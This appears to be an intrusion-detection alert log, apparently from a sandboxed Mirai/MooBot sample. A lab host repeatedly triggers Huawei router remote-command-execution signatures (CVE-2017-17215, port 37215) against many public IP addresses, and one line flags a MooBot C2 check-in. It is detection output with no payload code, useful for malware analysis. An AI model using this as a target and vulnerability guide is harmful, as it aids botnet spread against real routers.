                                                    07/10/24-08:27:33.943279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214237215192.168.2.1434.147.125.194
                                                    07/10/24-08:26:59.533066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767037215192.168.2.1441.218.25.12
                                                    07/10/24-08:27:11.540186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892837215192.168.2.14157.45.241.50
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530637215192.168.2.1441.14.4.186
                                                    07/10/24-08:26:42.459051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173837215192.168.2.14157.32.217.7
                                                    07/10/24-08:27:10.642690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173837215192.168.2.14157.186.169.104
                                                    07/10/24-08:27:02.716431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630637215192.168.2.14157.154.115.232
                                                    07/10/24-08:26:28.597188TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)484665976192.168.2.1451.79.141.54
                                                    07/10/24-08:27:05.089807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428837215192.168.2.14197.250.162.101
                                                    07/10/24-08:27:13.965572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558037215192.168.2.1441.93.164.79
                                                    07/10/24-08:26:28.777569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370837215192.168.2.14188.214.117.245
                                                    07/10/24-08:26:49.840323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071437215192.168.2.14157.55.38.200
                                                    07/10/24-08:26:38.630807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139837215192.168.2.14157.111.82.204
                                                    07/10/24-08:27:14.822336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834637215192.168.2.14197.128.45.232
                                                    07/10/24-08:27:17.078747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412237215192.168.2.14197.138.194.201
                                                    07/10/24-08:26:43.788473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877837215192.168.2.14157.197.252.59
                                                    07/10/24-08:26:17.933470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340637215192.168.2.14205.85.198.14
                                                    07/10/24-08:26:43.672613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000437215192.168.2.14197.176.122.201
                                                    07/10/24-08:26:36.377315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996837215192.168.2.1485.83.183.41
                                                    07/10/24-08:26:57.661675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029837215192.168.2.1463.251.96.67
                                                    07/10/24-08:26:42.380057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875637215192.168.2.14223.117.27.99
                                                    07/10/24-08:26:14.811760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405637215192.168.2.14197.234.132.84
                                                    07/10/24-08:27:19.222748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059037215192.168.2.1496.167.206.111
                                                    07/10/24-08:27:30.454627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918837215192.168.2.1441.27.15.25
                                                    07/10/24-08:26:55.470816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842237215192.168.2.14120.69.87.76
                                                    07/10/24-08:26:57.666585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957837215192.168.2.1441.26.216.247
                                                    07/10/24-08:27:20.487738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403637215192.168.2.14157.236.230.213
                                                    07/10/24-08:26:15.788826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735437215192.168.2.1441.162.215.169
                                                    07/10/24-08:26:38.605361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306037215192.168.2.14197.103.13.106
                                                    07/10/24-08:27:08.423540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708637215192.168.2.14197.168.39.76
                                                    07/10/24-08:26:28.890895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842837215192.168.2.14157.193.165.222
                                                    07/10/24-08:26:33.262601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739837215192.168.2.1441.213.239.135
                                                    07/10/24-08:26:47.856770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698637215192.168.2.1483.248.160.238
                                                    07/10/24-08:26:36.337218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853837215192.168.2.14122.35.113.42
                                                    07/10/24-08:26:47.941527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964437215192.168.2.1441.144.218.69
                                                    07/10/24-08:26:51.945867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874437215192.168.2.14197.123.110.163
                                                    07/10/24-08:27:14.821259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720837215192.168.2.14157.111.224.99
                                                    07/10/24-08:26:23.317114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035837215192.168.2.14157.26.170.61
                                                    07/10/24-08:26:15.872361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651437215192.168.2.14157.157.81.159
                                                    07/10/24-08:26:41.535361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095237215192.168.2.14157.87.50.98
                                                    07/10/24-08:27:14.026177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148237215192.168.2.14157.161.57.232
                                                    07/10/24-08:27:22.933807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208237215192.168.2.14197.198.236.79
                                                    07/10/24-08:27:23.903843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382437215192.168.2.14197.145.13.62
                                                    07/10/24-08:27:32.491395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262237215192.168.2.14197.101.120.51
                                                    07/10/24-08:26:15.858486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770037215192.168.2.1461.254.165.95
                                                    07/10/24-08:26:20.164271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751037215192.168.2.1441.106.123.113
                                                    07/10/24-08:27:17.068125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035037215192.168.2.14197.185.246.195
                                                    07/10/24-08:26:17.961786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644237215192.168.2.1473.53.184.10
                                                    07/10/24-08:26:28.929842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293437215192.168.2.14197.163.27.232
                                                    07/10/24-08:27:33.759873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882037215192.168.2.1441.68.176.190
                                                    07/10/24-08:26:47.901324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859237215192.168.2.1441.43.63.148
                                                    07/10/24-08:27:03.000596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564437215192.168.2.14197.198.99.254
                                                    07/10/24-08:27:07.307540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152637215192.168.2.14197.153.181.248
                                                    07/10/24-08:26:34.217432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998037215192.168.2.14157.191.6.152
                                                    07/10/24-08:26:59.853365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530037215192.168.2.1441.179.97.135
                                                    07/10/24-08:26:36.435588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890837215192.168.2.14197.148.120.7
                                                    07/10/24-08:26:41.397697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669237215192.168.2.1485.77.227.20
                                                    07/10/24-08:27:19.157761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984037215192.168.2.1472.251.212.208
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5919837215192.168.2.14197.57.24.175
                                                    07/10/24-08:26:15.872780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838437215192.168.2.14194.132.244.169
                                                    07/10/24-08:26:52.060029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696037215192.168.2.14197.87.0.232
                                                    07/10/24-08:27:20.460517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083037215192.168.2.14197.3.154.82
                                                    07/10/24-08:27:17.041321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595037215192.168.2.14197.148.44.162
                                                    07/10/24-08:26:28.689305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939037215192.168.2.14157.61.103.95
                                                    07/10/24-08:26:42.347593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091637215192.168.2.1441.53.86.29
                                                    07/10/24-08:26:36.365413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887637215192.168.2.1441.206.134.136
                                                    07/10/24-08:27:28.045782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365037215192.168.2.14197.84.57.7
                                                    07/10/24-08:26:17.925290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064637215192.168.2.14217.249.199.178
                                                    07/10/24-08:26:34.262800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854037215192.168.2.14197.230.185.181
                                                    07/10/24-08:27:17.037647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674837215192.168.2.14157.130.75.236
                                                    07/10/24-08:26:38.511212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059037215192.168.2.1441.218.166.228
                                                    07/10/24-08:27:05.083120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525437215192.168.2.14128.162.76.160
                                                    07/10/24-08:26:36.395459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352437215192.168.2.14157.131.101.97
                                                    07/10/24-08:26:55.302858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434837215192.168.2.14123.166.211.108
                                                    07/10/24-08:26:43.766311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633437215192.168.2.14197.118.152.202
                                                    07/10/24-08:27:23.917453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876037215192.168.2.1441.92.21.243
                                                    07/10/24-08:27:02.908233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492237215192.168.2.14197.29.84.73
                                                    07/10/24-08:26:29.868553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060237215192.168.2.1441.33.188.120
                                                    07/10/24-08:27:13.800580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840437215192.168.2.1441.62.5.40
                                                    07/10/24-08:26:41.587846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623637215192.168.2.14197.111.100.87
                                                    07/10/24-08:27:24.878345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264037215192.168.2.14157.235.215.36
                                                    07/10/24-08:27:11.522434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5143037215192.168.2.14197.168.31.212
                                                    07/10/24-08:26:26.621009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277437215192.168.2.14140.191.194.64
                                                    07/10/24-08:26:29.856235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519037215192.168.2.1463.254.157.108
                                                    07/10/24-08:26:18.001524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850037215192.168.2.14197.230.148.136
                                                    07/10/24-08:26:23.353927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854237215192.168.2.1474.205.66.202
                                                    07/10/24-08:26:38.585781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865837215192.168.2.14197.223.59.226
                                                    07/10/24-08:26:47.883651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5248837215192.168.2.1441.21.107.42
                                                    07/10/24-08:26:57.574047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.1441.94.195.139
                                                    07/10/24-08:27:11.531536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.1441.38.196.181
                                                    07/10/24-08:27:14.793732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224037215192.168.2.14157.178.47.164
                                                    07/10/24-08:26:15.867590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264437215192.168.2.14157.254.230.157
                                                    07/10/24-08:26:25.464984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642837215192.168.2.1441.33.162.36
                                                    07/10/24-08:26:42.425783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424637215192.168.2.1453.70.165.34
                                                    07/10/24-08:27:05.102101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573037215192.168.2.14197.104.144.42
                                                    07/10/24-08:26:11.186644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843837215192.168.2.14157.144.214.203
                                                    07/10/24-08:26:59.586779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469437215192.168.2.1441.12.14.29
                                                    07/10/24-08:27:19.303785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601437215192.168.2.14149.40.15.141
                                                    07/10/24-08:27:08.375967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794637215192.168.2.14157.57.228.85
                                                    07/10/24-08:27:22.834558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924037215192.168.2.14157.195.72.188
                                                    07/10/24-08:27:33.977851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805437215192.168.2.1441.188.19.150
                                                    07/10/24-08:26:11.571607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792637215192.168.2.14116.186.51.211
                                                    07/10/24-08:27:17.062116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290237215192.168.2.14149.231.16.44
                                                    07/10/24-08:26:47.988456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022637215192.168.2.1441.5.90.104
                                                    07/10/24-08:26:11.136584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744837215192.168.2.14197.77.24.89
                                                    07/10/24-08:27:05.193569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011037215192.168.2.14157.75.200.124
                                                    07/10/24-08:27:33.852238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865437215192.168.2.14155.9.17.125
                                                    07/10/24-08:27:05.167933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789237215192.168.2.14113.237.79.3
                                                    07/10/24-08:26:49.795487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838637215192.168.2.1441.129.77.247
                                                    07/10/24-08:27:19.146990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168237215192.168.2.1441.25.90.5
                                                    07/10/24-08:26:25.430208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269437215192.168.2.14157.55.169.26
                                                    07/10/24-08:27:07.365607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864237215192.168.2.14163.32.226.132
                                                    07/10/24-08:27:17.079394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661037215192.168.2.14157.90.88.229
                                                    07/10/24-08:27:07.268531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511237215192.168.2.14197.21.162.228
                                                    07/10/24-08:26:26.561697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966437215192.168.2.1441.216.62.231
                                                    07/10/24-08:26:11.587668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034837215192.168.2.14157.51.240.162
                                                    07/10/24-08:26:51.996552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996237215192.168.2.14197.186.201.145
                                                    07/10/24-08:27:05.129654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546637215192.168.2.1441.16.41.140
                                                    07/10/24-08:26:31.070289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866037215192.168.2.14179.50.113.236
                                                    07/10/24-08:27:33.926621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065637215192.168.2.14135.34.134.66
                                                    07/10/24-08:26:14.819736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803837215192.168.2.14157.82.42.129
                                                    07/10/24-08:26:52.064971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956037215192.168.2.14197.145.64.138
                                                    07/10/24-08:26:28.693119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504437215192.168.2.14110.32.21.244
                                                    07/10/24-08:26:36.395459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067837215192.168.2.14122.207.58.43
                                                    07/10/24-08:27:05.234090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788037215192.168.2.1441.250.205.45
                                                    07/10/24-08:26:22.273288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975237215192.168.2.14124.173.166.61
                                                    07/10/24-08:26:48.002361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728637215192.168.2.14118.154.66.18
                                                    07/10/24-08:26:42.386874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564637215192.168.2.14171.107.145.59
                                                    07/10/24-08:27:13.829336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139837215192.168.2.14197.68.109.215
                                                    07/10/24-08:26:25.516790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515237215192.168.2.14197.183.94.46
                                                    07/10/24-08:26:38.611968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227637215192.168.2.14119.250.216.89
                                                    07/10/24-08:26:23.344412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450037215192.168.2.14197.152.13.80
                                                    07/10/24-08:26:41.550813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617037215192.168.2.14157.154.147.9
                                                    07/10/24-08:26:14.805928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934437215192.168.2.1441.201.127.25
                                                    07/10/24-08:26:26.482822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738437215192.168.2.14157.53.66.35
                                                    07/10/24-08:27:23.939164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218837215192.168.2.14197.9.154.192
                                                    07/10/24-08:27:19.161022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958237215192.168.2.14148.163.134.18
                                                    07/10/24-08:26:28.853209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164837215192.168.2.14157.167.2.6
                                                    07/10/24-08:26:36.361562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341837215192.168.2.14197.211.187.208
                                                    07/10/24-08:27:19.330211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.14197.50.137.120
                                                    07/10/24-08:26:20.134395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535837215192.168.2.14157.6.199.142
                                                    07/10/24-08:27:13.822075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919437215192.168.2.14157.52.172.177
                                                    07/10/24-08:26:15.764270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046437215192.168.2.14157.138.128.85
                                                    07/10/24-08:26:17.939725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908037215192.168.2.14188.120.90.127
                                                    07/10/24-08:26:59.873449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277237215192.168.2.1478.107.110.73
                                                    07/10/24-08:27:27.177891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077037215192.168.2.14157.5.172.21
                                                    07/10/24-08:27:33.886878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242037215192.168.2.1441.199.95.125
                                                    07/10/24-08:26:14.735455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910837215192.168.2.1441.250.101.7
                                                    07/10/24-08:26:57.667245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840037215192.168.2.14197.166.161.88
                                                    07/10/24-08:26:17.997634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681237215192.168.2.14157.29.238.144
                                                    07/10/24-08:26:53.154328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.1472.55.235.242
                                                    07/10/24-08:27:07.394204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068837215192.168.2.14157.225.33.138
                                                    07/10/24-08:27:05.155297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940037215192.168.2.14197.181.244.39
                                                    07/10/24-08:27:07.371632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638837215192.168.2.14157.248.191.16
                                                    07/10/24-08:27:10.617808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572837215192.168.2.14157.31.70.4
                                                    07/10/24-08:27:08.415369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555837215192.168.2.14197.41.208.211
                                                    07/10/24-08:26:47.864255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117037215192.168.2.14169.115.185.78
                                                    07/10/24-08:26:22.264063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546437215192.168.2.14157.214.213.0
                                                    07/10/24-08:26:29.832636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001037215192.168.2.14102.231.247.232
                                                    07/10/24-08:27:02.985311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011037215192.168.2.14197.253.100.225
                                                    07/10/24-08:26:20.188191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288837215192.168.2.1441.112.206.105
                                                    07/10/24-08:27:34.133115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482437215192.168.2.1419.188.174.54
                                                    07/10/24-08:27:31.561854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729837215192.168.2.1441.186.174.142
                                                    07/10/24-08:26:11.162688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227837215192.168.2.14197.23.163.14
                                                    07/10/24-08:27:07.259692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275637215192.168.2.14221.135.51.124
                                                    07/10/24-08:27:13.867822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137237215192.168.2.14158.186.206.92
                                                    07/10/24-08:26:11.494095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683837215192.168.2.14197.227.245.236
                                                    07/10/24-08:27:22.856924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636637215192.168.2.14157.91.189.221
                                                    07/10/24-08:26:41.439991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003637215192.168.2.1479.241.2.31
                                                    07/10/24-08:27:02.966535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162437215192.168.2.1441.171.132.33
                                                    07/10/24-08:27:05.212811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304637215192.168.2.14157.207.104.235
                                                    07/10/24-08:26:11.544307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598037215192.168.2.1466.8.227.125
                                                    07/10/24-08:26:14.622208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977437215192.168.2.14157.213.218.72
                                                    07/10/24-08:27:22.773467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109837215192.168.2.14197.127.34.64
                                                    07/10/24-08:26:31.051778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993037215192.168.2.1441.44.67.132
                                                    07/10/24-08:27:05.164451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396037215192.168.2.14171.5.193.221
                                                    07/10/24-08:27:17.070048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512837215192.168.2.1441.236.72.153
                                                    07/10/24-08:26:45.685620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434837215192.168.2.14157.195.210.212
                                                    07/10/24-08:27:14.865429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149437215192.168.2.1441.84.2.198
                                                    07/10/24-08:26:14.819736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147637215192.168.2.1412.149.8.18
                                                    07/10/24-08:26:18.001692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499437215192.168.2.14143.142.143.104
                                                    07/10/24-08:26:26.595344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541637215192.168.2.14197.239.125.157
                                                    07/10/24-08:27:19.301991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611237215192.168.2.1441.99.204.159
                                                    07/10/24-08:26:41.418203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267437215192.168.2.1441.157.201.20
                                                    07/10/24-08:27:10.657807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986237215192.168.2.14157.169.121.66
                                                    07/10/24-08:26:18.017676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490637215192.168.2.1440.4.65.2
